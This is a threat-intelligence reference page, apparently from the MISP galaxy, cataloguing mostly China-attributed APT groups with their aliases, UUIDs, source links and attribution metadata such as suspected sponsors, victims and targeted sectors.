Threat Actor
Known or estimated adversary groups targeting organizations and employees. Adversary groups are regularly confused with their initial operation or campaign. threat-actor-classification meta can be used to clarify the understanding of the threat-actor if also considered as operation, campaign or activity group.
Authors
Authors and/or Contributors |
---|
Alexandre Dulaunoy |
Florian Roth |
Thomas Schreck |
Timo Steffens |
Various |
APT1
PLA Unit 61398 (Chinese: 61398部队, Pinyin: 61398 bùduì) is the Military Unit Cover Designator (MUCD)[1] of a People's Liberation Army advanced persistent threat unit that has been alleged to be a source of Chinese computer hacking attacks
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT1.
Known Synonyms |
---|
Brown Fox |
Byzantine Candor |
COMMENT PANDA |
Comment Crew |
Comment Group |
G0006 |
GIF89a |
Group 3 |
PLA Unit 61398 |
ShadyRAT |
TG-8223 |
Internal MISP references
UUID 1cb7e1cc-d695-42b1-92f4-fd0112a3c9be
which can be used as unique global reference for APT1
in MISP communities and other software using the MISP galaxy
External references
- https://en.wikipedia.org/wiki/PLA_Unit_61398 - webarchive
- http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf - webarchive
- https://www.cfr.org/interactive/cyber-operations/pla-unit-61398 - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/the-siesta-campaign-a-new-targeted-attack-awakens/ - webarchive
- https://www.fireeye.com/blog/threat-research/2014/03/a-detailed-examination-of-the-siesta-campaign.html - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-oceansalt-delivers-wave-after-wave/ - webarchive
- https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=f1265df5-6e5e-4fcc-9828-d4ddbbafd3d7&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://attack.mitre.org/groups/G0006/ - webarchive
- https://www.nytimes.com/2014/05/20/us/us-to-charge-chinese-workers-with-cyberspying.html - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States', 'Taiwan', 'Israel', 'Norway', 'United Arab Emirates', 'United Kingdom', 'Singapore', 'India', 'Belgium', 'South Africa', 'Switzerland', 'Canada', 'France', 'Luxembourg', 'Japan'] |
cfr-target-category | ['Private sector', 'Government'] |
cfr-type-of-incident | Espionage |
country | CN |
Related clusters
To see the related clusters, click here.
Nitro
These attackers were the subject of an extensive report by Symantec in 2011, which termed the attackers Nitro and stated: 'The goal of the attackers appears to be to collect intellectual property such as design documents, formulas, and manufacturing processes. In addition, the same attackers appear to have a lengthy operation history including attacks on other industries and organizations. Attacks on the chemical industry are merely their latest attack wave. As part of our investigations, we were also able to identify and contact one of the attackers to try and gain insights into the motivations behind these attacks.' Palo Alto Networks reported on continued activity by the attackers in 2014.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Nitro.
Known Synonyms |
---|
Covert Grove |
Internal MISP references
UUID 0b06fb39-ed3d-4868-ac42-12fff6df2c80
which can be used as unique global reference for Nitro
in MISP communities and other software using the MISP galaxy
External references
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/the_nitro_attacks.pdf - webarchive
- https://unit42.paloaltonetworks.com/new-indicators-compromise-apt-group-nitro-uncovered/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/the-significance-of-the-nitro-attacks/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
targeted-sector | ['Chemical'] |
Dust Storm
Threat actors behind the Operation Dust Storm have been active since at least 2010, the hackers targeted several organizations in Japan, South Korea, the US, Europe, and other Asian countries.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dust Storm.
Known Synonyms |
---|
G0031 |
Internal MISP references
UUID 9e71024e-817f-45b0-92a0-d886c30bc929
which can be used as unique global reference for Dust Storm
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Related clusters
To see the related clusters, click here.
WET PANDA
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WET PANDA.
Known Synonyms |
---|
Red Chimera |
Internal MISP references
UUID ba8973b2-fd97-4aa7-9307-ea4838d96428
which can be used as unique global reference for WET PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
FOXY PANDA
Adversary group targeting telecommunication and technology organizations.
Internal MISP references
UUID 41c15f08-a646-49f7-a644-1bebbf7a4dcd
which can be used as unique global reference for FOXY PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
targeted-sector | ['Technology', 'Telecoms'] |
PREDATOR PANDA
Internal MISP references
UUID 1969f622-d64a-4436-9a34-4c47fcb2535f
which can be used as unique global reference for PREDATOR PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
UNION PANDA
Internal MISP references
UUID 7195b51f-500e-4034-a851-bf34a2728dc8
which can be used as unique global reference for UNION PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
SPICY PANDA
Internal MISP references
UUID 4959652d-72fa-46e4-be20-4ec686409bfb
which can be used as unique global reference for SPICY PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
ELOQUENT PANDA
Internal MISP references
UUID 432b0304-768f-4fb9-9762-e745ef524ec7
which can be used as unique global reference for ELOQUENT PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
DIZZY PANDA
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DIZZY PANDA.
Known Synonyms |
---|
LadyBoyle |
Internal MISP references
UUID 8a8f39df-74b3-4946-ab64-f84968bababe
which can be used as unique global reference for DIZZY PANDA
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
Grayling
Grayling activity was first observed in early 2023, when a number of victims were identified with distinctive malicious DLL side-loading activity. Grayling appears to target organisations in Asia, however one unknown organisation in the United States was also targeted. Industries targeted include Biomedical, Government and Information Technology. Grayling use a variety of tools during their attacks, including well known tools such as Cobalt Strike and Havoc and also some others.
Internal MISP references
UUID 6714de29-4dd8-463c-99a3-77c9e80fa47d
which can be used as unique global reference for Grayling
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Taiwan', 'United States', 'Vietnam', 'Solomon Islands'] |
cfr-target-category | ['Biomedical', 'Government', 'Information technology'] |
country | CN |
APT2
Putter Panda were the subject of an extensive report by CrowdStrike, which stated: 'The CrowdStrike Intelligence team has been tracking this particular unit since2012, under the codename PUTTER PANDA, and has documented activity dating back to 2007. The report identifies Chen Ping, aka cpyy, and the primary location of Unit 61486.'
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT2.
Known Synonyms |
---|
4HCrew |
G0024 |
MSUpdater |
PLA Unit 61486 |
PUTTER PANDA |
SULPHUR |
SearchFire |
TG-6952 |
Internal MISP references
UUID 0ca45163-e223-4167-b1af-f088ed14a93d
which can be used as unique global reference for APT2
in MISP communities and other software using the MISP galaxy
External references
- http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf - webarchive
- https://www.cfr.org/interactive/cyber-operations/putter-panda - webarchive
- https://attack.mitre.org/groups/G0024 - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['U.S. satellite and aerospace sector'] |
cfr-target-category | ['Private sector', 'Government'] |
cfr-type-of-incident | Espionage |
country | CN |
Related clusters
To see the related clusters, click here.
APT3
Symantec described UPS in 2016 report as: 'Buckeye (also known as APT3, Gothic Panda, UPS Team, and TG-0110) is a cyberespionage group that is believed to have been operating for well over half a decade. Traditionally, the group attacked organizations in the US as well as other targets. However, Buckeyes focus appears to have changed as of June 2015, when the group began compromising political entities in Hong Kong.'
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT3.
Known Synonyms |
---|
BORON |
BRONZE MAYFAIR |
Boyusec |
Buckeye |
GOTHIC PANDA |
Group 6 |
Red Sylvan |
TG-0110 |
UPS |
Internal MISP references
UUID d144c83e-2302-4947-9e24-856fbf7949ae
which can be used as unique global reference for APT3
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html - webarchive
- https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong - webarchive
- https://www.cfr.org/interactive/cyber-operations/apt-3 - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-mayfair - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States', 'United Kingdom', 'Hong Kong'] |
cfr-target-category | ['Private sector'] |
cfr-type-of-incident | Espionage |
country | CN |
targeted-sector | ['Political party'] |
Related clusters
To see the related clusters, click here.
DarkHotel
Kaspersky described DarkHotel in a 2014 report as: '... DarkHotel drives its campaigns by spear-phishing targets with highly advanced Flash zero-day exploits that effectively evade the latest Windows and Adobe defenses, and yet they also imprecisely spread among large numbers of vague targets with peer-to-peer spreading tactics. Moreover, this crews most unusual characteristic is that for several years the Darkhotel APT has maintained a capability to use hotel networks to follow and hit selected targets as they travel around the world.'
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DarkHotel.
Known Synonyms |
---|
APT-C-06 |
ATK52 |
DUBNIUM |
Fallout Team |
G0012 |
Karba |
Luder |
Nemim |
Nemin |
Pioneer |
SIG25 |
Shadow Crane |
T-APT-02 |
TUNGSTEN BRIDGE |
Tapaoux |
Zigzag Hail |
Internal MISP references
UUID b8c8b96d-61e6-47b1-8e38-fd8ad5d9854d
which can be used as unique global reference for DarkHotel
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/ - webarchive
- https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2 - webarchive
- https://securelist.com/blog/research/66779/the-darkhotel-apt/ - webarchive
- https://securelist.com/the-darkhotel-apt/66779/ - webarchive
- https://web.archive.org/web/20160104165148/http://drops.wooyun.org/tips/11726 - webarchive
- https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/darkhotel - webarchive
- https://www.securityweek.com/darkhotel-apt-uses-new-methods-target-politicians - webarchive
- https://attack.mitre.org/groups/G0012/ - webarchive
- https://www.secureworks.com/research/threat-profiles/tungsten-bridge - webarchive
- https://www.antiy.cn/research/notice&report/research_report/20200522.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Korea (Republic of) |
cfr-suspected-victims | ['Japan', 'Russia', 'Taiwan', 'South Korea', 'China'] |
cfr-target-category | ['Private sector'] |
cfr-type-of-incident | Espionage |
country | KR |
Related clusters
To see the related clusters, click here.
APT12
A group of China-based attackers, who conducted a number of spear phishing attacks in 2013.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT12.
Known Synonyms |
---|
BRONZE GLOBE |
BeeBus |
Calc Team |
Crimson Iron |
DNSCalc |
DynCalc |
Group 22 |
IXESHE |
NUMBERED PANDA |
TG-2754 |
Internal MISP references
UUID 48146604-6693-4db1-bd94-159744726514
which can be used as unique global reference for APT12
in MISP communities and other software using the MISP galaxy
External references
- http://www.crowdstrike.com/blog/whois-numbered-panda/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/apt-12 - webarchive
- https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-globe - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Taiwan', 'Japan'] |
cfr-target-category | ['Private sector', 'Government'] |
cfr-type-of-incident | Espionage |
country | CN |
Related clusters
To see the related clusters, click here.
APT16
Between November 26, 2015, and December 1, 2015, known and suspected China-based APT groups launched several spear-phishing attacks targeting Japanese and Taiwanese organizations in the high-tech, government services, media and financial services industries. Each campaign delivered a malicious Microsoft Word document exploiting the aforementioned EPS dict copy use-after-free vulnerability, and the local Windows privilege escalation vulnerability CVE-2015-1701. The successful exploitation of both vulnerabilities led to the delivery of either a downloader that we refer to as IRONHALO, or a backdoor that we refer to as ELMER.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT16.
Known Synonyms |
---|
G0023 |
SVCMONDR |
Internal MISP references
UUID 1f73e14f-b882-4032-a565-26dc653b0daf
which can be used as unique global reference for APT16
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html - webarchive
- https://www.cfr.org/interactive/cyber-operations/apt-16 - webarchive
- https://attack.mitre.org/groups/G0023 - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Japan', 'Taiwan'] |
cfr-target-category | ['Private sector'] |
cfr-type-of-incident | Espionage |
country | CN |
APT17
FireEye described APT17 in a 2015 report as: 'APT17, also known as DeputyDog, is a China based threat group that FireEye Intelligence has observed conducting network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations.'
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT17.
Known Synonyms |
---|
AURORA PANDA |
Axiom |
BRONZE KEYSTONE |
Dogfish |
G0001 |
G0025 |
Group 72 |
Group 8 |
HELIUM |
Hidden Lynx |
Tailgater Team |
Internal MISP references
UUID 99e30d89-9361-4b73-a999-9e5ff9320bcb
which can be used as unique global reference for APT17
in MISP communities and other software using the MISP galaxy
External references
- https://web.archive.org/web/20130924130243/https://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf - webarchive
- https://www.cfr.org/interactive/cyber-operations/apt-17 - webarchive
- https://www.carbonblack.com/2013/02/08/bit9-and-our-customers-security/ - webarchive
- https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware - webarchive
- https://web.archive.org/web/20130920000343/https://www.symantec.com/connect/blogs/hidden-lynx-professional-hackers-hire - webarchive
- https://www.recordedfuture.com/hidden-lynx-analysis/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-keystone - webarchive
- https://attack.mitre.org/groups/G0025/ - webarchive
- https://cfr.org/cyber-operations/axiom - webarchive
- https://attack.mitre.org/groups/G0001/ - webarchive
- https://www.youtube.com/watch?v=NFJqD-LcpIg - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States', 'Netherlands', 'Italy', 'Japan', 'United Kingdom', 'Belgium', 'Russia', 'Indonesia', 'Germany', 'Switzerland', 'China'] |
cfr-target-category | ['Government', 'Private sector', 'Civil society'] |
cfr-type-of-incident | Espionage |
country | CN |
targeted-sector | ['Defense', 'Intelligence', 'Technology', 'Mining', 'Government, Administration', 'Justice'] |
Related clusters
To see the related clusters, click here.
APT18
Wekby was described by Palo Alto Networks in a 2015 report as: 'Wekby is a group that has been active for a number of years, targeting various industries such as healthcare, telecommunications, aerospace, defense, and high tech. The group is known to leverage recently released exploits very shortly after those exploits are available, such as in the case of HackingTeams Flash zero - day exploit.'
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT18.
Known Synonyms |
---|
DYNAMITE PANDA |
G0026 |
PLA Navy |
SCANDIUM |
TG-0416 |
Wekby |
Internal MISP references
UUID 9a683d9c-8f7d-43df-bba2-ad0ca71e277c
which can be used as unique global reference for APT18
in MISP communities and other software using the MISP galaxy
External references
- https://threatpost.com/apt-gang-branches-out-to-medical-espionage-in-community-health-breach/107828 - webarchive
- https://www.cfr.org/interactive/cyber-operations/apt-18 - webarchive
- https://attack.mitre.org/groups/G0026 - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States'] |
cfr-target-category | ['Government', 'Private sector', 'Civil society'] |
cfr-type-of-incident | Espionage |
country | CN |
targeted-sector | ['Aerospace', 'Defense', 'Health', 'High tech', 'Telecoms'] |
Related clusters
To see the related clusters, click here.
APT19
Adversary group targeting financial, technology, non-profit organisations.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT19.
Known Synonyms |
---|
BRONZE FIRESTONE |
Black Vine |
Codoso |
DEEP PANDA |
G0009 |
G0073 |
Group 13 |
KungFu Kittens |
PinkPanther |
Pupa |
Shell Crew |
Sunshop Group |
TEMP.Avengers |
WebMasters |
Internal MISP references
UUID 066d25c1-71bd-4bd4-8ca7-edbba00063f4
which can be used as unique global reference for APT19
in MISP communities and other software using the MISP galaxy
External references
- http://cybercampaigns.net/wp-content/uploads/2013/06/Deep-Panda.pdf - webarchive
- https://docs.huihoo.com/rsaconference/usa-2014/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries-final.pdf - webarchive
- https://www.cfr.org/interactive/cyber-operations/deep-panda - webarchive
- https://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/ - webarchive
- https://eromang.zataz.com/2013/01/02/capstone-turbine-corporation-also-targeted-in-the-cfr-watering-hole-attack-and-more/ - webarchive
- https://www.crowdstrike.com/blog/department-labor-strategic-web-compromise/ - webarchive
- https://www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/ - webarchive
- https://krebsonsecurity.com/2015/06/catching-up-on-the-opm-breach/ - webarchive
- https://krebsonsecurity.com/2015/02/anthem-breach-may-have-started-in-april-2014/ - webarchive
- https://www.nextgov.com/cybersecurity/2015/05/third-party-software-was-entry-point-background-check-system-hack/112354/ - webarchive
- https://www.crowdstrike.com/blog/ironman-deep-panda-uses-sakula-malware-target-organizations-multiple-sectors/ - webarchive
- https://www.abc.net.au/news/2014-11-13/g20-china-affliliated-hackers-breaches-australian-media/5889442 - webarchive
- https://www.washingtonpost.com/business/economy/keypoint-suffers-network-breach-thousands-of-fed-workers-could-be-affected/2014/12/18/e6c7146c-86e1-11e4-a702-fa31ff4ae98e_story.html - webarchive
- https://www.seattletimes.com/business/local-business/feds-warned-premera-about-security-flaws-before-breach/ - webarchive
- https://krebsonsecurity.com/2015/05/carefirst-blue-cross-breach-hits-1-1m/ - webarchive
- https://threatvector.cylance.com/en_us/home/shell-crew-variants-continue-to-fly-under-big-avs-radar.html - webarchive
- https://www.bleepingcomputer.com/news/security/us-arrests-chinese-man-involved-with-sakula-malware-used-in-opm-and-anthem-hacks/ - webarchive
- https://gizmodo.com/u-s-indicts-chinese-hacker-spies-in-conspiracy-to-stea-1830111695 - webarchive
- https://www.cyberscoop.com/anthem-breach-indictment-chinese-national/ - webarchive
- https://docs.broadcom.com/doc/the-black-vine-cyberespionage-group - webarchive
- https://attack.mitre.org/groups/G0009/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-firestone - webarchive
- https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks - webarchive
- http://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/ - webarchive
- https://www.nytimes.com/2016/06/12/technology/the-chinese-hackers-in-the-back-office.html - webarchive
- https://www.ncsc.gov.uk/content/files/protected_files/article_files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel - webarchive
- https://www.youtube.com/watch?v=FC9ARZIZglI - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States'] |
cfr-target-category | ['Private sector', 'Military'] |
cfr-type-of-incident | Espionage |
country | CN |
targeted-sector | ['Technology', 'Finance', 'Non-profit organisation'] |
Related clusters
To see the related clusters, click here.
Naikon
Kaspersky described Naikon in a 2015 report as: 'The Naikon group is mostly active in countries such as the Philippines, Malaysia, Cambodia, Indonesia, Vietnam, Myanmar, Singapore, and Nepal, hitting a variety of targets in a very opportunistic way.'
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Naikon.
Known Synonyms |
---|
BRONZE GENEVA |
BRONZE STERLING |
Camerashy |
G0013 |
G0019 |
Naikon |
OVERRIDE PANDA |
PLA Unit 78020 |
Internal MISP references
UUID 2f1fd017-9df6-4759-91fb-e7039609b5ff
which can be used as unique global reference for Naikon
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/analysis/publications/69953/the-naikon-apt/ - webarchive
- https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf - webarchive
- https://usa.kaspersky.com/resource-center/threats/naikon-targeted-attacks - webarchive
- https://web.archive.org/web/20210925164035/https://blog.trendmicro.com/trendlabs-security-intelligence/bkdr_rarstone-new-rat-to-watch-out-for/ - webarchive
- https://threatconnect.com/blog/tag/naikon/ - webarchive
- https://attack.mitre.org/groups/G0019/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-geneva - webarchive
- https://cyware.com/news/chinese-naikon-group-back-with-new-espionage-attack-66a8413d - webarchive
- https://cluster25.io/2022/04/29/lotus-panda-awake-last-strike/ - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['India', 'Saudi Arabia', 'Vietnam', 'Myanmar', 'Singapore', 'Thailand', 'Malaysia', 'Cambodia', 'China', 'Philippines', 'South Korea', 'United States', 'Indonesia', 'Laos'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | CN |
Related clusters
To see the related clusters, click here.
APT30
APT30 is a threat group suspected to be associated with the Chinese government. While Naikon shares some characteristics with APT30, the two groups do not appear to be exact matches
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT30.
Known Synonyms |
---|
G0013 |
Internal MISP references
UUID d3881afe-f781-4c53-9f68-33487a119a59
which can be used as unique global reference for APT30
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States', 'South Korea', 'Saudi Arabia', 'Thailand', 'Vietnam', 'Malaysia', 'India'] |
cfr-target-category | ['Government'] |
cfr-type-of-incident | Espionage |
country | CN |
Related clusters
To see the related clusters, click here.
LOTUS PANDA
Lotus Blossom is a threat group that has targeted government and military organizations in Southeast Asia.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LOTUS PANDA.
Known Synonyms |
---|
ATK1 |
BRONZE ELGIN |
DRAGONFISH |
G0030 |
Lotus BLossom |
Red Salamander |
ST Group |
Spring Dragon |
Internal MISP references
UUID 32fafa69-fe3c-49db-afd4-aac2664bcf0d
which can be used as unique global reference for LOTUS PANDA
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/blog/research/70726/the-spring-dragon-apt/ - webarchive
- https://securelist.com/spring-dragon-updated-activity/79067/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/lotus-blossom - webarchive
- https://unit42.paloaltonetworks.com/operation-lotus-blossom/ - webarchive
- https://www.accenture.com/t00010101T000000Z__w__/gb-en/_acnmedia/PDF-46/Accenture-Security-Elise-Threat-Analysis.pdf - webarchive
- https://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/ - webarchive
- https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting - webarchive
- https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf - webarchive
- https://attack.mitre.org/groups/G0030/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-elgin - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Japan', 'Philippines', 'Hong Kong', 'Indonesia', 'Taiwan', 'Vietnam'] |
cfr-target-category | ['Military', 'Government'] |
cfr-type-of-incident | Espionage |
country | CN |
targeted-sector | ['Military', 'Government, Administration'] |
Related clusters
To see the related clusters, click here.
HURRICANE PANDA
We have investigated their intrusions since 2013 and have been battling them nonstop over the last year at several large telecommunications and technology companies. The determination of this China-based adversary is truly impressive: they are like a dog with a bone. HURRICANE PANDA's preferred initial vector of compromise and persistence is a China Chopper webshell – a tiny and easily obfuscated 70 byte text file that consists of an ‘eval()’ command, which is then used to provide full command execution and file upload/download capabilities to the attackers. This script is typically uploaded to a web server via a SQL injection or WebDAV vulnerability, which is often trivial to uncover in a company with a large external web presence. Once inside, the adversary immediately moves on to execution of a credential theft tool such as Mimikatz (repacked to avoid AV detection). If they are lucky to have caught an administrator who might be logged into that web server at the time, they will have gained domain administrator credentials and can now roam your network at will via ‘net use’ and ‘wmic’ commands executed through the webshell terminal.
Internal MISP references
UUID 0286e80e-b0ed-464f-ad62-beec8536d0cb
which can be used as unique global reference for HURRICANE PANDA
in MISP communities and other software using the MISP galaxy
External references
- http://www.crowdstrike.com/blog/cyber-deterrence-in-action-a-story-of-one-long-hurricane-panda-campaign/ - webarchive
- https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/ - webarchive
- https://www.crowdstrike.com/blog/storm-chasing/ - webarchive
- https://www.crowdstrike.com/blog/cyber-deterrence-in-action-a-story-of-one-long-hurricane-panda-campaign/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
targeted-sector | ['Technology', 'Telecoms'] |
APT27
A China-based actor that targets foreign embassies to collect data on government, defence, and technology sectors.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT27.
Known Synonyms |
---|
BRONZE UNION |
Budworm |
EMISSARY PANDA |
Earth Smilodon |
G0027 |
GreedyTaotie |
Group 35 |
Iron Taurus |
Iron Tiger |
Lucky Mouse |
Red Phoenix |
TEMP.Hippo |
TG-3390 |
ZipToken |
Internal MISP references
UUID 834e0acd-d92a-4e38-bb14-dc4159d7cb32
which can be used as unique global reference for APT27
in MISP communities and other software using the MISP galaxy
External references
- https://i.blackhat.com/Asia-22/Friday-Materials/AS-22-Li-To-Loot-Or-Not-To-Loot-That-Is-Not-a-Question.pdf - webarchive
- https://web.archive.org/web/20140129192702/https://www.scmagazineuk.com/iran-and-russia-blamed-for-state-sponsored-espionage/article/330401/ - webarchive
- https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/ - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/185/Bitdefender-Business-2017-WhitePaper-PZCHAO-crea2452-en-EN-GenericUse.pdf - webarchive
- https://www.cfr.org/interactive/cyber-operations/iron-tiger - webarchive
- https://www.bleepingcomputer.com/news/security/chinese-cyber-espionage-group-hacked-government-data-center/ - webarchive
- https://www.secureworks.com/research/bronze-union - webarchive
- http://newsroom.trendmicro.com/blog/operation-iron-tiger-attackers-shift-east-asia-united-states - webarchive
- https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage - webarchive
